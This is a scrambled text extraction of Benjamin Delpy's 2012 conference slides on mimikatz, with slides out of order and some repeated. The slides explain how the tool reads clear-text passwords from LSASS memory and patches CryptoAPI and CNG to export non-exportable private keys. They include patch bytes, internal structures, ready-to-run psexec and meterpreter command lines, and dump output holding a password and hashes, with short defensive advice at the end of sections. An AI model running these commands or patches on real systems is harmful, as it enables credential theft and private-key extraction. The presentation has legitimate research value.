What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
